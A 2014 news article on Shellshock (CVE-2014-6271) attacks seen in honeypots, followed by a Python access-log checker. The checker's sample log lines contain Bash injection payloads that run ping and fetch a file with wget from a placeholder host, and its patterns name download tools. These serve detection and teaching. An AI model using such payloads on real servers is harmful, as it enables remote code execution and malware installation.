Wednesday, 4 October, 2023
IT Security Guru

Shellshock-related attacks detected

by The Gurus
September 26, 2014
in Editor's News

Within hours of the Shellshock/Bash vulnerability being disclosed, attacks exploiting it in the wild to download additional malware were detected.
 
According to Zscaler’s ThreatLabZ research team, upon successful exploitation of the CVE-2014-6271 vulnerability, an attacker is able to download and install a malicious ELF binary on the target Linux system. The malware connects to a predetermined Command and Control server on a specific port and awaits further instructions from the attacker.
 
Other threat labs also reported attacks. According to AlienVault’s Jaime Blasco, the company began running a new module in its honeypots upon notification of the flaw, and it observed “several hits” in the last 24 hours.
 
He said: “Most of them are systems trying to detect if the system is vulnerable and they simply send a ping command back to the attacker’s machine.” He also said that the honeypot received another interesting attack from a file with a PERL script that seems to be a repurposed IRC bot that connects to an IRC server and waits for commands.
 
Blasco said: “As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443, it joins a channel on the IRC server. It seems there are 715 users (probably victims) connected to the server right now. As soon as new victims join the server, the attackers are executing the command ‘uname -a’ to determine the operating system that is running on the victim as well as ‘id’ to check the current username. Since our honeypot joined the server, more than 20 new victims have become part of the botnet.”
 
Wolfgang Kandek, CTO of Qualys, said: “Our Web Application Firewall has the signatures needed to detect and block Shellshock attacks against websites. The detection is very reliable and is activated by default in the “normal” and “aggressive” settings on the WAF configuration page.
 
“Qualys scanners are considered not exploitable via the BASH vulnerability. Although Qualys scanners have a version of Bash vulnerable to CVE-2014-6271 installed, the scanner exposes no listening interfaces and services to the network, closing the common attack vectors discussed in the release of CVE-2014-6271. Further, Bash is not used in any of the communication mechanisms that the scanner uses: scan dispatching, software updates and monitoring. We will update Bash on the scanner in the next system update cycle.”
 
Check Point said in an update that it had released an IPS signature to protect customer environments. It said: “The signature enables organisations to add a layer of protection to their network during the time they need to update their systems with vendor provided patches. This protection will detect and block attempts to exploit this vulnerability.”
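
A minimal log check for the kind of requests the honeypots and signatures above deal with, added here as an illustration (not code from Zscaler, AlienVault, Qualys or Check Point): it flags web access-log fields containing the Bash function-definition prefix `() {` that CVE-2014-6271 depends on, and labels the trailing command as a probe or a download. The Apache combined log format, the label names and the sample lines are assumptions constructed for the example.

```python
import re

# Bash function-definition prefix that CVE-2014-6271 abuses: a value starting
# with "() {" is parsed as a function, and vulnerable Bash runs what follows it.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")
# Coarse labels for the trailing command, matching the behaviours reported above.
PROBE = re.compile(r"\bping\b")
DOWNLOAD = re.compile(r"\b(wget|curl)\b")

# Combined log format: ip - - [time] "request" status size "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def classify(line):
    """Return (source_ip, field, label) for a suspicious line, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    for field in ("request", "referer", "agent"):
        value = m.group(field)
        hit = FUNC_PREFIX.search(value)
        if not hit:
            continue
        tail = value[hit.end():]
        if DOWNLOAD.search(tail):
            label = "download"
        elif PROBE.search(tail):
            label = "probe"
        else:
            label = "other"
        return m.group("ip"), field, label
    return None

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [r for r in map(classify, lines) if r is not None]

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; ping -c 1 203.0.113.5"',
    '198.51.100.9 - - [25/Sep/2014:10:04:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 0 "() { :; }; wget http://203.0.113.5/sample" "Mozilla/5.0"',
    '192.0.2.33 - - [25/Sep/2014:10:05:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for ip, field, label in scan(SAMPLE):
        print(f"{ip} field={field} label={label}")
```

The combined log format records only the request line, Referer and User-Agent, so a payload carried in any other header will not appear in these logs and needs inspection at a proxy, WAF or IPS.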
